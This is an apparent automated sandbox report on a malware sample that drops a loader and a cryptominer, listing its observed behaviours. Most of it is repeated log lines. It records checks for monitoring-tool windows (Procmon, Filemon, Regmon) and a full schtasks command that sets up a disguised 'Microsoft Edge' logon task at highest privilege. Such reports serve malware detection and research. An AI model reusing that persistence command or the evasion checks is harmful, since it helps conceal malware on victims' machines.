                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
